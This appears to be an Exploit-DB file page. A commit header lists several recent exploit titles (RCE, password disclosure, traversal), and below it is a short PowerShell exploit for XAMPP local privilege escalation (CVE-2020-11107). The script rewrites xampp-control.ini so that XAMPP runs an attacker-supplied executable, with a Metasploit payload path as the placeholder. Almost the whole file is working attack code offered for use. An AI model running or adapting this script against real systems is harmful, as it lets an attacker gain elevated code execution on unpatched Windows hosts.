
19 changes to exploits/shellcodes Omnia MPX 1.5.0+r1 - Path Traversal Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) Wavlink WN533A8 - Cross-Site Scripting (XSS) Wavlink WN530HG4 - Password Disclosure Wavlink WN533A8 - Password Disclosure WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download WordPress Plugin Duplicator 1.4.7 - Information Disclosure CuteEditor for PHP 6.6 - Directory Traversal mPDF 7.0 - Local File Inclusion NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
14 lines
No EOL
598 B
PowerShell
14 lines
No EOL
598 B
PowerShell
# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
|
|
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
|
|
# Original Author: Maximilian Barz (@S1lkys)
|
|
# Date: 27/09/2021
|
|
# Vendor Homepage: https://www.apachefriends.org
|
|
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
|
|
# Tested on: Windows 10 + XAMPP 7.3.10
|
|
# References: https://github.com/S1lkys/CVE-2020-11107
|
|
|
|
$file = "C:\xampp\xampp-control.ini"
|
|
$find = ((Get-Content $file)[2] -Split "=")[1]
|
|
# Insert your payload path here
|
|
$replace = "C:\temp\msf.exe"
|
|
(Get-Content $file) -replace $find, $replace | Set-Content $file |